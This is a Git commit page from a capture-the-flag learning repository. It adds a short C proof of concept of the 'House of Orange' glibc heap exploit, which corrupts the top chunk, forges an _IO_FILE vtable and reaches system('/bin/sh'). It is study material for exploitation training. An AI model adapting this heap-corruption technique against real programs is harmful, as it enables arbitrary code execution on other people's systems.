nganhkhoa/CTF-All-In-One
1
0
Fork 0
mirror of https://github.com/nganhkhoa/CTF-All-In-One.git synced 2025-06-24 04:05:03 +07:00
Code Issues Projects Releases Wiki Activity

finish 3.3.7

Browse Source
This commit is contained in:
firmianay
2018-01-21 21:57:25 +08:00
parent 3c7fc5adc8
commit 257320bb68
2 changed files with 570 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

40
src/Others/3.3.5_heap_exploit/house_of_orange.c Normal file
View File

@ -0,0 +1,40 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int winner (char *ptr);
int main() {
char *p1, *p2;
size_t io_list_all, *top;
p1 = malloc(0x400 - 0x10);
top = (size_t *) ((char *) p1 + 0x400 - 0x10);
top[1] = 0xc01;
p2 = malloc(0x1000);
io_list_all = top[2] + 0x9a8;
top[3] = io_list_all - 0x10;
memcpy((char *) top, "/bin/sh\x00", 8);
top[1] = 0x61;
_IO_FILE *fp = (_IO_FILE *) top;
fp->_mode = 0; // top+0xc0
fp->_IO_write_base = (char *) 2; // top+0x20
fp->_IO_write_ptr = (char *) 3; // top+0x28
size_t *jump_table = &top[12]; // controlled memory
jump_table[3] = (size_t) &winner;
*(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table; // top+0xd8
malloc(1);
return 0;
}
int winner(char *ptr) {
system(ptr);
return 0;
}